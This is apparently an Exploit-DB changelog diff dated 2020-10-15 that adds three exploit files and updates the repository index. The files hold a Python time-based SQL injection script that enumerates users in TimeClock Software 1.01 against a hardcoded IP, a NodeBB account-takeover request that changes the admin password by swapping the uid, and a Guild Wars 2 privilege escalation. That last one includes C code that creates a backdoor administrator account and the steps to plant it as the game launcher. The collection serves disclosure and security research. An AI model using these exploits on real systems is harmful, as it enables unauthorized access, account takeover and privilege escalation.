DB: 2020-10-15

3 changes to exploits/shellcodes

Guild Wars 2 - Insecure Folder Permissions

TimeClock Software 0.995 - Multiple SQL Injections
TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections
TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection
NodeBB Forum 1.12.2-1.14.2 - Account Takeover

exploits/multiple/webapps/48875.txt

@@ -0,0 +1,21 @@
+# Exploit Title:  NodeBB Forum 1.12.2-1.14.2 - Account Takeover
+# Date: 2020-08-18
+# Exploit Author: Muhammed Eren Uygun
+# Vendor Homepage: https://nodebb.org/
+# Software Link: https://github.com/NodeBB/NodeBB
+# Version: 1.12.2-1.14.2
+# Tested on: Linux
+# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
+Impact:
+----------------------
+A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.
+
+Bug PoC:
+----------------------
+Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
+1- Create a user
+2- Go to password change page
+3- Change password with proxy
+427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
+4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
+5-  So you can login with this password to admin user.

exploits/php/webapps/48874.py

@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+
+# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
+# Date: July 21, 2020
+# Exploit Author: François Bibeau
+# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
+# Vendor Homepage: http://timeclock-software.net/
+# Software Link: http://timeclock-software.net/timeclock-download.php
+# Version: 1.01
+# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
+
+import time
+import requests
+
+
+login_url = 'http://159.203.41.34/login_action.php'    # Ensure to change ip to match target
+login_data = {'username':'fred','password':'fred','submit':'Log In'}
+headers = {'User-Agent': 'Mozilla/5.0'}
+
+# init session & login
+session = requests.Session()
+session.post(login_url,headers=headers,data=login_data)
+
+# static list provided for PoC, could use a text file
+users = ['john','bill','tim','fred','garry','sid','admin']
+
+for user in users:
+	url = "http://159.203.41.34/add_entry.php"
+	payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
+
+	data = {'data_month': '1',
+	'data_day': '1',
+	'data_year': '1',
+	'type_id': '5',
+	'hours': '1',
+	'notes': payload,
+	'submit': 'Add'}
+
+	print(f'Checking user {user}... ', end = '')
+
+	start = time.time()
+	response = session.post(url,data=data)
+	end = time.time()
+
+	delay = end - start
+
+	if delay > 5:
+		print('User found!')
+	else:
+		print('')

exploits/windows/local/48876.txt

@@ -0,0 +1,107 @@
+# Exploit Title: Guild Wars 2 - Insecure Folder Permissions
+# Date: 2020-10-09
+# Exploit Author: George Tsimpidas
+# Software Link : https://account.arena.net/welcome
+# Version Build : 106915
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+# Category: local
+
+
+
+Vulnerability Description:
+
+Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges
+vulnerability which can be used by a simple user that can change the
+executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions,
+with the 'F' flag (Full) for 'Everyone' group, making the entire directory
+'Guild Wars 2' and its files and sub-dirs world-writable.
+
+
+# Local Privilege Escalation Proof of Concept
+
+
+D:\icacls "Guild Wars 2"
+Guild Wars 2 Everyone:(F)
+Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+NT AUTHORITY\Authenticated Users:(I)(M)
+NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+
+## Insecure File Permission
+
+D:\Guild Wars 2icacls Gw2-64.exe
+Gw2-64.exe Everyone:(F)
+Everyone:(I)(F)
+BUILTIN\Administrators:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\Authenticated Users:(I)(M)
+BUILTIN\Users:(I)(RX)
+
+
+
+#0. Download & install
+
+#1. Create low privileged user & change to the user
+## As admin
+
+C:\net user lowpriv Password123! /add
+C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the Service EXE to a new name
+
+D:\Guild Wars 2whoami
+lowpriv
+
+D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+## Add Admin User C Code
+
+kali# cat addAdmin.c
+int main(void){
+system("net user placebo mypassword /add");
+system("net localgroup Administrators placebo /add");
+WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
+return 0;
+}
+
+## Compile Code
+kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe
+
+#4. Transfer created 'Gw2-64' to the Windows Host
+
+#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder
+
+D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe .
+
+#6. Check that exploit admin user doesn't exists
+
+D:\Guild Wars 2net user placebo
+
+The user name could not be found
+
+#6. Reboot the Computer
+
+D:\Guild Wars 2shutdown /r
+
+#7. Login & now start the Guild Wars 2 Game, back doored launcher will be
+executed, and the user placebo will be created, and added to the
+Administrators group.
+
+C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None

files_exploits.csv

@@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port
 48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
+48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port
 39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80
 39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,
 39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80
-39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
+39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
 39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80
 39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware,
 39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
@@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port
 48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
 48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
 48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
+48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
+48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,